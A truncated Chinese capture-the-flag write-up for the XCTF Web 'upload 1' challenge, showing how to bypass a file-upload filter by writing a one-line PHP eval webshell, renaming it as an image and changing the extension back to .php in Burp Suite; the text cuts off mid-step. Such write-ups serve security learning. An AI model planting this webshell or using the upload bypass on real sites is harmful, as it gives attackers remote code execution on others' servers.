XCTF-Web|upload 1详细WriteUp

获取在线场景,得到: 联想可能是要上传webshell。于是编写一句话木马脚本: <?php @eval($_POST['flag']);?> 当直接上传.php文件时,显示: 可知需要修改文件后缀,成为图片格式 将一句话木马的文件后缀改为.png或.jpg 选择文件,开启burpsuite拦截器,上传文件: 在filename处修改文件后缀名为.php,全选数据包后右键,点击send to re
相关文章
相关标签/搜索